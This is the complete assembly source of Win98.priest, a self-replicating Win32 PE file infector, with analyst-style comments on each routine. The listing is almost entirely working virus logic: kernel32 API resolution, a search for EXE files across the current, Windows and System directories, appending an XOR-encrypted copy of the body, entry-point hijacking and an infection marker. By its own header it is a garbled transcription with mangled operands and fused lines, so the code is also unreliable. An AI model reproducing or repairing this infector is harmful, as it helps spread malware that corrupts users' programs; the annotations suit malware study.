Win98.priest
; Win98.priest - MASM (Intel syntax, .MODEL FLAT, 32-bit) listing of a
; Win32 PE appending file infector targeting Win9x.
; This text is a transcribed/extracted copy: the '+' between a base
; register and its displacement is missing in most memory operands
; (e.g. [EBP LIMIT] means [EBP+LIMIT]), a few lines are fused together,
; and several mnemonics and literals are mangled. The comments describe
; what the listing shows; they do not repair it.
;
; The equates Limit..ExEw are byte offsets into a scratch area that the
; code addresses as [EBP+off] once EBP has been pointed at slack space in
; a read/write section of the host (see OK_SE). Slots Create..Getp receive
; resolved kernel32 export addresses (Find_fun); the others hold state.
.386
.MODEL FLAT
EXTRN EXITPROCESS: PROC
Ker32 EQU 0BFF70000H          ; hard-coded kernel32 image base (Win9x era); the only module base used
Limit Equ 0000h               ; bound for the export-name search in Find_src
AddName EQU 0004H             ; -> kernel32 AddressOfNames (advanced in place by Find_src)
AddFun EQU 0008H              ; -> kernel32 AddressOfFunctions
Addord Equ 000ch              ; -> kernel32 AddressOfNameOrdinals
Create EQU 0010H              ; CreateFileA          (slots filled in the order of the strings at W_ENC_END)
Close Equ 0014H               ; _lclose
RFile EQU 0018H               ; ReadFile
FFIND EQU 001CH               ; FindFirstFileA
NFIND EQU 0020H               ; FindNextFileA
White EQU 0024H               ; WriteFile
FPOIN EQU 0028H               ; SetFilePointer
Getw EQU 002ch                ; GetWindowsDirectoryA
Gets Equ 0030H                ; GetSystemDirectoryA
Getc EQU 0034H                ; GetCurrentDirectoryA
SRCHC EQU 0038H               ; FindClose
Getp EQU 003ch                ; GetProcAddress (found by walking the export table, not via Find_fun)
Shand Equ 0040h               ; FindFirstFileA search handle
Fhand Equ 0044H               ; handle of the file currently open
Reads equ 0048h               ; lpNumberOfBytesRead/Written for ReadFile/WriteFile
Oldedi EQU 004ch              ; not referenced anywhere in this listing
Chkif Equ 0050H               ; number of files modified this run (compared against 6)
CHKDI EQU 0054H               ; directory-walk state: current dir, then Windows dir, then System dir
Wichi EQU 0058H               ; pointer to where the file name is appended inside the path buffer
ExEw Equ 005ch                ; path buffer; 100H-58H (0A8H) is passed as its size to the Get*Directory calls
DataA EQU 0200H               ; WIN32_FIND_DATA buffer (nFileSizeLow at +20H, cFileName at +2CH)
HEADS EQU 0300H               ; 400H-byte copy of the target's headers; W_enc is copied to HEADS+400H
.code
;-----------------------------------------------------------------------
; START_VIRUS - entry point of an infected program.
; Computes its own load delta (call/pop), saves all registers, then runs
; the in-place decryptor over Virus_body..End_virus-4.
; The key in "MOV EAX, 00H" at Key_code is patched at infection time:
; W_enc writes a DWORD at Key_code+1, i.e. the immediate of that MOV.
; A freshly assembled copy therefore has key 0 and the loop is a no-op.
;-----------------------------------------------------------------------
START_VIRUS:
Call delta_offset
DELTA_OFFSET:
POP EBP                       ; EBP = runtime address of DELTA_OFFSET
Sub EBP, Offset Delta_offset  ; EBP = load delta (runtime address - assembled address)
Pushhad                       ; as printed; the matching POPAD is the first instruction of Virus_body
Key_code:
MOV EAX, 00H                  ; decryption key (immediate patched by W_enc)
Lea ESI, [Virus_Body EBP]     ; ESI = &Virus_Body, delta-relative
MOV ECX, END_VIRUS - VIRUS_BODY -4  ; iteration count; the loop advances one byte per step
Keycode:
XOR DWORD PTR [ESI], EAX      ; 4-byte XOR at a 1-byte stride: every byte is hit by four successive keys
Add ESI, 1
Xchg Al, AH                   ; key schedule: swap the two low bytes, then rotate right by one bit
Ror Eax, 1
Loop keycode
;-----------------------------------------------------------------------
; Virus_body - the decrypted body. Locates the host's PE header in
; memory, picks a read/write section with enough slack to hold the
; scratch area and points EBP at it, then walks the kernel32 export
; directory (at the fixed base Ker32) to find GetProcAddress by name.
; Any failure jumps to R_ip, which transfers control to the host.
; Note: after OK_SE, EBP no longer holds the load delta. The virus's own
; runtime base travels on the stack and is taken into EBX/EAX/EDI by the
; POP/PUSH pairs below (offsets "X - START_VIRUS" are added to it).
;-----------------------------------------------------------------------
Virus_body:
Popad
Push EAX
MOV EAX, [Oldip EBP]          ; Oldip = host's original entry-point RVA (stored by OK_INFECT)
Add Eax, 400000H              ; + the assumed image base -> VA of the original entry point
Push EAX                      ; consumed by R_ip (POP EAX / JMP EAX)
Call scan_data                ; ESI -> 'PE\0\0' of the in-memory host; falls into R_ip when not found
Mov EDI, ESI                  ; EDI = PE header
Add ESI, 6                    ; ESI -> FileHeader.NumberOfSections
CMP Word PTR [ESI], 0
JE r_ip
XOR ECX, ECX
MOV CX, [ESI]                 ; ECX = NumberOfSections
Add ESI, 0F2H
Add ESI, 24h                  ; ESI -> Characteristics of section header 0 (PE+0F8H+24H)
Add EDI, 0F8H                 ; EDI -> section header 0
CHK_SE:
MOV EAX, [ESI]
And Eax, 0C0000000H           ; keep IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CMP EAX, 0C00000H             ; compared against 0C00000H, not 0C0000000H, as printed
JNE next_se
Mov Eax, [EDI 8h]             ; VirtualSize
MOV EBX, 511
Add Eax, EBX
XOR EDX, EDX
Inc EBX
Div EBX
Mul EBX                       ; EAX = VirtualSize rounded up to a multiple of 512
Sub Eax, [EDI 10h]            ; minus SizeOfRawData -> slack available for the scratch area
CMP EAX, 700H (W_ENC_END - W_ENC)   ; operand mangled in the listing; the bound is not recoverable here
JGE OK_SE                     ; signed compare
Next_se:
Add ESI, 28H                  ; sizeof(IMAGE_SECTION_HEADER)
Add Edi, 28h
Loop chk_se
JMP R_IP                      ; no usable section: hand control back to the host
OK_SE:
MOV ESI, [EDI 0CH]            ; VirtualAddress
Add ESI, [EDI 10h]            ; + SizeOfRawData
Add ESI, 400000H              ; + assumed image base
MOV EBP, ESI                  ; EBP = scratch area base; every [EBP+off] slot lives here from now on
XOR EAX, EAX
MOV ESI, KER32 3CH            ; &kernel32 e_lfanew, from the fixed base (no relocation handling)
Lodsw
Add Eax, Ker32                ; EAX = kernel32 PE header
CMP DWORD PTR [EAX], 00004550H   ; "PE\0\0"
JNE R_IP
MOV ESI, [EAX 78H]            ; DataDirectory[EXPORT].VirtualAddress
Add ESI, 24                   ; +18H -> IMAGE_EXPORT_DIRECTORY.NumberOfNames
Add ESI, KER32
Lodsd
Add Eax, Ker32                ; Ker32 is added to the name count as well, as printed
MOV [EBP LIMIT], EAX
Lodsd
Add Eax, Ker32
MOV [EBP AddFun], EAX         ; AddressOfFunctions (+18H+4 = 1CH)
Lodsd
Add Eax, Ker32
MOV [EBP AddName], EAX        ; AddressOfNames (20H)
Lodsd
Add Eax, Ker32
MOV [EBP Addord], EAX         ; AddressOfNameOrdinals (24H)
POP EAX
POP EBXPUSH EBX               ; two instructions fused in the listing
Push EAX
MOV ESI, EBX
Add ESI, Offset GP - START_VIRUS   ; EBX = virus runtime base; ESI -> the "GetProcAddress" string
MOV EBX, ESI
MOV EDI, [EBP AddName]
Mov Edi, [EDI]
Add Edi, Ker32                ; EDI -> first exported name
XOR ECX, ECX                  ; ECX = name index, counted up inside Find_src
Call find_src                 ; no match: Find_src itself exits through R_ip
SHL ECX, 1                    ; index * sizeof(WORD)
MOV ESI, [EBP Addord]
Add ESI, ECX
XOR EAX, EAX
MOV AX, Word PTR [ESI]        ; ordinal of the matched name
SHL EAX, 2                    ; ordinal * sizeof(DWORD)
MOV ESI, [EBP AddFun]
Add ESI, ESI                  ; as printed: ESI is doubled and EAX is not used as the index
Mov Edi, [ESI]
Add Edi, Ker32
MOV [getp ebp], EDI           ; GetProcAddress
Mov EBX, CREATE               ; first slot Find_fun will fill
POP EAX
POP EDI
Push EDI
Push EAX
Add Edi, Offset CF - Start_Virus   ; EDI -> first API name string (CF)
;-----------------------------------------------------------------------
; Find_fun - resolves the API names listed after W_ENC_END, in order,
; through GetProcAddress(Ker32, name) and stores each result in the
; next 4-byte slot from Create up to (not including) Getp. EDI is moved
; to the next string with REPNE SCASB; ECX is not set before it.
; OK_FIND_FILE / OK_EXE then fetch the current directory into EXEW and
; append a search pattern for FindFirstFileA.
;-----------------------------------------------------------------------
Find_fun:
Push EDI                      ; lpProcName
Push ke32                     ; hModule ("ke32" as printed; the equate is Ker32)
Call [getp ebp]               ; GetProcAddress
MOV [EBX EBP], EAX            ; store into slot [EBP+EBX]
Add ebx, 4
CMP EBX, GETP                 ; stop once the slot just below Getp has been filled
JE OK_FIND_FILE
MOV Al, 0
Repne scaSB                   ; advance EDI past the current string's NUL terminator
JMP Find_Fun
OK_FIND_FILE:
Lea EAX, [EBP EXEW]
Push EAX                      ; lpBuffer
Push 100H - 58H               ; nBufferLength = 0A8H
Call [Getc EBP]               ; GetCurrentDirectoryA
OR EAX, EAX
JE chG_DIR                    ; 0 = failure -> move on to the next directory
OK_EXE:
Lea ESI, [EBP DATAA]
PUSH ESI                      ; lpFindFileData for the FindFirstFileA call below
Lea EDI, [EBP EXEW]
Push EDI                      ; lpFileName
Scan_dir:
CMP Byte Ptr [EDI], 00H       ; find the end of the directory string
JE OK_MAKE_EXE
Add EDI, 1
JMP scan_dir
OK_MAKE_EXE:
Mov al, ''                    ; character literal lost in the listing
Stosb
MOV DWORD PTR [EBP WICHI], EDI   ; remember where the file name gets appended
MOV AX, '. *'                 ; literal mangled; together with the STOSD this appends a "*.EXE"-style pattern
Stosw
Mov Eax, 'EXE'
Stosd
Call [EBP FFIND]              ; FindFirstFileA(EXEW, DATAA)
MOV [EBP SHAND], EAX
CMP EAX, -1                   ; INVALID_HANDLE_VALUE
JE r_ip
MOV EAX, 0                    ; index into cFileName for the Open_file scan
;-----------------------------------------------------------------------
; Open_file - candidate filter and header validation for one directory
; entry. Skips names containing 'V' or 'N', opens the file read/write,
; reads its first 400H bytes into HEADS and requires: 'MZ', e_lfanew not
; past the end of the buffer, 'PE', ImageBase 400000H, no '^^' marker at
; MZ+12H, at most 6 sections, and a section whose Characteristics pass
; the same read/write test as CHK_SE. Anything else -> file_close.
; On success ESI = PE header inside HEADS, EDI -> the chosen section's
; Characteristics field, and control continues at OK_INFECT.
;-----------------------------------------------------------------------
Open_file:
CMP BYTE PTR [EBP DATAA 2CH EAX], 'V'   ; DATAA+2CH = cFileName
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'N'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'V'   ; duplicates of the two checks above
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'N'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 0     ; end of the name reached without a hit
JE OPEN_FILE_START
Add Eax, 1
JMP Open_FILE
Open_FILE_START:
MOV EDI, DWORD PTR [EBP WICHI]   ; append the file name to the path buffer
MOV ECX, 20                      ; a fixed 20 bytes are copied regardless of the name's length
Lea ESI, [EBP DATAA 2CH]
Repz Movsb
PUSH 0                           ; hTemplateFile
PUSH 0                           ; dwFlagsAndAttributes
Push 3                           ; dwCreationDisposition = OPEN_EXISTING
PUSH 0                           ; lpSecurityAttributes
PUSH 0                           ; dwShareMode = 0 (exclusive)
Push 0C0000000H                  ; GENERIC_READ | GENERIC_WRITE
Lea EAX, [EBP EXEW]
Push EAX                         ; lpFileName
Call [EBP CREATE]                ; CreateFileA
MOV [EBP FHAND], EAX
CMP EAX, -1                      ; INVALID_HANDLE_VALUE
Je file_close                    ; file_close still passes this value to _lclose
MOV ECX, 400H
Lea Edx, [EBP Heads]
Lea Eax, [EBP READS]
PUSH 0                           ; lpOverlapped
Push EAX                         ; lpNumberOfBytesRead
Push ECX                         ; nNumberOfBytesToRead = 400H
Push Edx                         ; lpBuffer = HEADS
Push DWORD PTR [EBP FHAND]
Call [EBP RFILE]                 ; ReadFile
CMP EAX, 0
Je file_close
CMP Word PTR [EBP Heads], 'ZM'   ; "MZ" in little-endian
JNE File_Close
XOR EAX, EAX
Lea ESI, [EBP HEADS 3CH]
Lodsw                            ; AX = e_lfanew (low 16 bits only)
Add Eax, EBP
Add eax, Heads                   ; EAX = &HEADS[e_lfanew]
Mov ESI, EAX                     ; ESI = PE header in the buffer; used by the whole infector
Lea EBX, [EBP HEADS 400H]
CMP EAX, EBX
JG file_close                    ; only the start of the PE header is checked against the buffer end
CMP Word PTR [EAX], 'EP'         ; "PE"
JNE File_Close
CMP DWORD PTR [EAX 34H], 400000H ; OptionalHeader.ImageBase must be 400000H
JNE File_Close
CMP Word PTR [EBP Heads 12h], '^^'   ; infection marker in the DOS header (written by r_body)
Je file_close
CMP Word PTR [ESI 6], 6          ; NumberOfSections
JG file_close
XOR ECX, ECX
Mov EDI, ESI
MOV CX, Word PTR [ESI 6]
Add EDI, 0F8H                    ; EDI -> section header 0
CHK_DATA:
Add EDI, 24h                     ; -> Characteristics
MOV EAX, DWORD PTR [EDI]
And Eax, 0C0000000H              ; IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
CMP EAX, 0C00000H                ; same constant as CHK_SE, as printed
JE OK_INFECT                     ; EDI is left pointing at this section's Characteristics
Add Edi, 4H                      ; 24H + 4 = 28H: next section header
Loop chk_data
JMP file_close
;-----------------------------------------------------------------------
; OK_INFECT - prepare the append. Seeks to the current end of file,
; records the host's AddressOfEntryPoint in Oldip inside the virus
; image, rounds the virus length to FileAlignment, grows SizeOfImage by
; that amount, then copies the W_enc..W_ENC_END routine to HEADS+400H
; and jumps into that copy (it re-keys and encrypts the body, writes it,
; and continues at r_body).
; Stack on entry (from the PUSH EDI / PUSH EAX just before Find_fun):
; [esp] = saved EAX, [esp+4] = virus runtime base.
;-----------------------------------------------------------------------
OK_INFECT:
MOV EAX, [EBP DATAA 20H]      ; nFileSizeLow
Call F_seek                   ; SetFilePointer(FHAND, size, FILE_BEGIN): position at end of file
Mov EDI, [ESI 28H]            ; AddressOfEntryPoint
POP EBX
POP EAX                       ; EAX = virus runtime base
Push EAX
Push EBX
Add Eax, Offset Oldip - Start_Virus
Mov DWORD PTR [EAX], EDI      ; Oldip = host entry RVA (read back by Virus_body in the infected file)
MOV EAX, Offset End_virus - Start_Virus
MOV ECX, [ESI 3CH]            ; FileAlignment
Add Eax, ECX
XOR EDX, EDX
Div ECX
Mul ECX                       ; EAX = (virus size + FileAlignment) truncated to a FileAlignment multiple
Add DWORD PTR [ESI 50H], EAX  ; SizeOfImage += rounded size
MOV ECX, EAX
POP EAX
POP EBX
MOV EDX, EBX                  ; EDX = virus runtime base
Push EBX
Push EAX
Push ECX                      ; rounded size; popped as EBX near the end of r_body
Push ECX                      ; rounded size; popped as ECX at the start of r_body
MOV ECX, END_VIRUS - START_VIRUS   ; byte count that W_enc's fwrite call will use
Pushhad                       ; as printed; W_enc pops and re-pushes this register set around each call
Push Edx                      ; base; popped into EDX inside W_enc
Add Edx, Offset W_ENC - START_VIRUS
MOV ESI, EDX                  ; ESI = &W_enc
Lea EBP, [EBP HEADS]
Add ebp, 400h                 ; EBP = HEADS+400H for the copy only; W_enc's POPAD restores it
MOV EDI, EBP
Push EDI
MOV CX, OFFSET W_ENC_END - W_ENC   ; only CX is set; the upper half of ECX keeps its previous value
Repz Movsb                    ; copy W_enc..W_ENC_END into the scratch area
POP EDI
JMP EDI                       ; execute the copy
;-----------------------------------------------------------------------
; r_body - reached from W_enc after the encrypted body has been written.
; Writes ECX more bytes (taken from address 400000H, as printed), then
; patches the last section header and the optional header so the
; appended bytes are mapped and become the new entry point, stamps the
; '^^' marker into the DOS header, rewinds and rewrites the first 400H
; bytes of the file.
; ESI = PE header in HEADS; EDI is recomputed to the last section header.
; Detection note: the resulting entry point lies in a section whose
; Characteristics are set to 0C0000040H (read/write initialized data,
; no IMAGE_SCN_MEM_EXECUTE bit).
;-----------------------------------------------------------------------
r_body:
Popad
POP ECX                       ; rounded size pushed at OK_INFECT
Sub ECX, Offset End_virus - Start_virus   ; ECX = padding the rounding added
Mov EDX, 400000H              ; source buffer for the write, as printed
Call fwrite                   ; WriteFile(FHAND, 400000H, ECX)
MOV EAX, [EBP DATAA 20H]      ; nFileSizeLow
MOV ECX, [ESI 3CH]            ; FileAlignment
Mov EDX, 0
Div ECX                       ; EAX = size / FileAlignment, EDX = size % FileAlignment
Push Edx
Push EAX
Mov EDI, ESI
MOV AX, Word PTR [ESI 6]      ; NumberOfSections (only AX is written; the upper half of EAX is stale)
SUB EAX, 1
MOV ECX, 28h
Mul ECX
Add Eax, 0F8H
Add Edi, EAX                  ; EDI -> last section header
XOR EDX, EDXMOV EAX, [EDI 14H]   ; two instructions fused in the listing; PointerToRawData
MOV ECX, [ESI 3CH]
Div ECX                       ; EAX = PointerToRawData / FileAlignment
POP EDX
Sub EDX, EAX                  ; (file size - PointerToRawData) in alignment units
Push Edx
Mov Eax, [EDI 10h]            ; SizeOfRawData
SUB EAX, 1
Add Eax, ECX
XOR EDX, EDX
Div ECX
MOV EBX, EAX                  ; ceil(SizeOfRawData / FileAlignment)
POP EAX
Sub Eax, EBX                  ; alignment units between the section's aligned raw end and EOF
Mul ECX                       ; ... in bytes
POP EDX
Add Eax, EDX                  ; + size % FileAlignment -> EAX = bytes past the last section (assuming PointerToRawData is aligned)
Add DWORD PTR [ESI 50H], EAX  ; SizeOfImage += that gap
MOV EBX, [EDI 0CH]            ; VirtualAddress
Add EBX, [EDI 10h]            ; + SizeOfRawData
Add Ebx, EAX                  ; + gap
MOV [ESI 28H], EBX            ; AddressOfEntryPoint = RVA of the appended code
POP EBX                       ; rounded size (the other copy pushed at OK_INFECT)
Add Ebx, EAX
Add [EDI 8h], EBX             ; VirtualSize   += rounded size + gap
Add [EDI 10H], EBX            ; SizeOfRawData += rounded size + gap
MOV [EDI 24H], 0C0000040H     ; Characteristics = INITIALIZED_DATA | MEM_READ | MEM_WRITE (no size specifier, as printed)
MOV Word PTR [EBP Heads 12H], '^^'   ; infection marker, checked by Open_file
MOV EAX, 0
Call F_seek                   ; rewind to offset 0
Lea Edx, [EBP Heads]
MOV ECX, 400H
Call fwrite                   ; write the modified headers back
Inc DWORD PTR ChKIF [EBP]     ; one more file modified this run
;-----------------------------------------------------------------------
; FILE_CLOSE / Next_file / CHG_DIR - close the current file, move to the
; next directory entry, and once the search is exhausted switch to the
; Windows directory and then the System directory (CHKDI state). Exits
; to the host as soon as Chkif reaches 6 or no directory is left.
;-----------------------------------------------------------------------
FILE_CLOSE:
Push DWORD PTR [EBP FHAND]
Call [EBP Close]              ; _lclose(FHAND); also reached with FHAND = -1
CMP DWORD PTR Chkif [EBP], 6
JE chG_DIR                    ; per-run cap of 6 modified files
Next_file:
Lea Eax, [EBP DATAA]
Push EAX                      ; lpFindFileData
Push DWORD PTR [EBP SHAND]    ; hFindFile
Call [EBP NFIND]              ; FindNextFileA
CMP EAX, 0
JE chG_DIR
JMP Open_FILE                 ; EAX still holds the nonzero return value; Open_file uses it as its start index into cFileName
CHG_DIR:
Push DWORD PTR [Shand EBP]
Call [EBP SRCHC]              ; FindClose(SHAND)
CMP DWORD PTR Chkif [EBP], 6
JE r_ip
CMP DWORD PTR CHKDI [EBP], 1
Jg chg_dir_2                  ; Windows directory already visited
Add DWORD PTR CHKDI [EBP], 2
PUSH 100H-58H                 ; uSize = 0A8H
Lea EAX, [EBP EXEW]
Push EAX                      ; lpBuffer
Call [EBP GETW]               ; GetWindowsDirectoryA
OR EAX, EAX
JE CHG_DIR_2
JMP OK_EXE
CHG_DIR_2:
CMP DWORD PTR CHKDI [EBP], 2
JG R_IP                       ; all three directories done
Add DWORD PTR CHKDI [EBP], 1
PUSH 100H-58H
Lea EAX, [EBP EXEW]
Push EAX
Call [EBP GETS]               ; GetSystemDirectoryA
OR EAX, EAX
JE r_ip
JMP OK_EXE
;-----------------------------------------------------------------------
; Scan_data - byte-wise search from 400000H for the 'PE\0\0' signature.
; Only CX is loaded, so the effective count depends on ECX's upper half.
; Hit: RET (via R_CO) with ESI -> signature. Miss: falls through to R_ip.
; R_ip - exit to the host: pops the entry-point VA pushed at Virus_body
; (and the value beneath it) and jumps there. It is also the common
; failure exit, so on other paths the two POPs take whatever happens to
; be on top of the stack.
; R_CO - shared RET.
;-----------------------------------------------------------------------
Scan_data:
MOV ESI, 400000H
MOV CX, 600H
SCAN_PE:
CMP DWORD PTR [ESI], 00004550H   ; "PE\0\0"
Je r_co
Inc ESI
Loop scan_pe
R_ip:
POP EAX
POP EBX
JMP EAX
R_CO:
RET
;-----------------------------------------------------------------------
; Find_src - linear search of the kernel32 export name table.
; In:  EBX -> wanted name, EDI -> current export name, CX = name index.
; Out: RET (via R_CO) with CX = index of the matching name; AddName has
;      been advanced in place to that entry.
; Match rule: after an equal byte, a NUL as the next byte of the export
; name counts as a match (the wanted string's own terminator is not
; checked). No match before Limit: drop the return address, exit via R_IP.
;-----------------------------------------------------------------------
Find_src:
MOV ESI, EBX                  ; restart at the beginning of the wanted name
X_m:
CMPSB                         ; compare [ESI] with [EDI], advance both
JNE FIND_SRC_2
CMP Byte Ptr [EDI], 0         ; end of the export name reached after equal bytes -> match
Je r_co
JMP X_M
Find_src_2:
INC CX                        ; next name index (16-bit increment only)
CMP CX, [EBP LIMIT]           ; Limit had Ker32 added to it when loaded, as printed
JGE NOT_SRC
Add DWORD PTR [EBP AddName], 4   ; advance the AddressOfNames cursor
MOV EDI, [EBP AddName]
Mov Edi, [EDI]
Add Edi, Ker32                ; EDI -> next export name
JMP Find_SRC
NOT_SRC:
POP ESI                       ; discard Find_src's return address
JMP R_IP
;-----------------------------------------------------------------------
; F_seek - SetFilePointer(FHAND, EAX, NULL, FILE_BEGIN).
; In: EAX = absolute file offset. Out: EAX = SetFilePointer's result.
;-----------------------------------------------------------------------
F_seek:
PUSH 0                        ; dwMoveMethod = FILE_BEGIN
PUSH 0                        ; lpDistanceToMoveHigh = NULL
Push EAX                      ; lDistanceToMove
Push DWORD PTR [EBP FHAND]    ; hFile
Call [EBP fpoin]
RET
;-----------------------------------------------------------------------
; W_enc - runs from its copy at HEADS+400H (see OK_INFECT).
; Derives a key from two reads of I/O port 40h (PIT channel 0 counter
; on PC hardware) plus EDI, patches that key into the MOV EAX immediate
; of ENCRY_E (in the copy) and of Key_code (in the virus image), encrypts
; Virus_body..End_virus-4 in place, writes the whole image with fwrite,
; decrypts it again with the same XOR routine, then jumps to r_body.
; POPAD/PUSHAD pairs re-load the register set saved at OK_INFECT before
; each step, so EDX (= base) and ECX (= END_VIRUS-START_VIRUS) are fresh.
; Analyst note: IN from ring 3 only works where the OS grants port
; access; on NT-family Windows it raises a privileged-instruction fault.
;-----------------------------------------------------------------------
W_enc:
IN Al, 40h
Xchg Al, AH
IN Al, 40h                    ; AX = two timer-counter bytes
Add Eax, EDI                  ; mixed with the current EDI value
Add Edi, Offset Encry_e - W_ENC 1   ; -> immediate of "MOV EAX, 00H" inside the copied ENCRY_E
Mov DWORD PTR [EDI], EAX
POP EDX                       ; virus runtime base, pushed at OK_INFECT
Add Edx, Offset Key_code - Start_virus 1   ; -> immediate of "MOV EAX, 00H" at Key_code
Mov DWORD PTR [EDX], EAX      ; the decryptor in the image now carries the same key
Popad
Pushhad                       ; as printed; reload the saved register set
MOV ESI, EDX
Add ESI, Offset Virus_Body - Start_Virus   ; ESI -> Virus_body (EDX = base after the POPAD)
MOV ECX, Offset End_virus - Virus_Body -4
Call encry_e                  ; encrypt in place
Popad
Pushhad
Call fwrite                   ; WriteFile(FHAND, base, END_VIRUS-START_VIRUS) from the saved EDX/ECX
Popad
Pushhad
MOV ESI, EDX
Add ESI, Offset Virus_Body - Start_Virus
MOV ECX, Offset End_virus - Virus_Body -4
Call encry_e                  ; same XOR transform -> decrypt back
Popad
Pushhad
Add Edx, Offset R_Body - START_VIRUS
JMP EDX                       ; continue at r_body in the virus image
;-----------------------------------------------------------------------
; ENCRY_E - the same sliding XOR as the Key_code loop at START_VIRUS.
; In: ESI -> data, ECX = iteration count. The key immediate (00H here)
; is patched by W_enc before this runs. Clobbers EAX, ESI, ECX, flags.
;-----------------------------------------------------------------------
ENCRY_E:
MOV EAX, 00H                  ; key (patched at runtime)
ENCRY:
XOR DWORD PTR [ESI], EAX
Xchg Al, AH                   ; key schedule identical to Keycode
Ror Eax, 1
Inc ESI                       ; 1-byte stride with a 4-byte XOR
Loop encry
RET
;-----------------------------------------------------------------------
; FWRITE - WriteFile(FHAND, EDX, ECX, &READS, NULL).
; In: EDX = buffer, ECX = byte count. Out: EAX = WriteFile's result.
;-----------------------------------------------------------------------
FWRITE:
PUSH 0                        ; lpOverlapped
Lea Eax, [EBP READS]
Push EAX                      ; lpNumberOfBytesWritten
Push ECX                      ; nNumberOfBytesToWrite
Push Edx                      ; lpBuffer
Push DWORD PTR [EBP FHAND]    ; hFile
Call [EBP White]
RET
;-----------------------------------------------------------------------
; Import-name table. Find_fun resolves these in order into the slots
; Create..SRCHC; GP is found separately by walking the export table.
; GetProcAddress and the export-name search above are case-sensitive;
; the mixed case printed here does not match the real export names and
; is most likely an artifact of the transcription. The GC line lacks
; its closing quote as printed. VN and the DB after it are the author's
; signature strings (a usable static signature). Oldip holds the saved
; host entry RVA; for the first-generation carrier it points at F_end.
;-----------------------------------------------------------------------
W_ENC_END:
CF DB 'CreateFilea', 0
CL DB '_LClose', 0
RF DB 'Readfile', 0
FF DB 'FINDFIRSTFILEA', 0
Fn DB 'FINDNEXTFILEA', 0
WF DB 'WRITEFILE', 0
sf db 'setfilepointer', 0
GW DB 'getWindowsDirectorya', 0
GS DB 'GetSystemDirectorya', 0
GC DB 'getcurrentdirectorya, 0
FC DB 'FindClose', 0
GP DB 'getProcaddress', 0      ; looked up by Find_src, not by Find_fun
VN DB 'WIN98.PRIEST'
DB 'SVS / COREA / MOV'
Oldip DD F_END - 400000H      ; host entry RVA; overwritten per infection by OK_INFECT
END_VIRUS:
;-----------------------------------------------------------------------
; F_end - first-generation "host": the carrier just exits. It lies past
; END_VIRUS, so it is not part of what gets appended. Oldip is
; initialised to F_END - 400000H, so Virus_body returns here when the
; unattached sample runs.
;-----------------------------------------------------------------------
F_end:
PUSH 0                        ; uExitCode
Call EXITPROCESS
End start_virus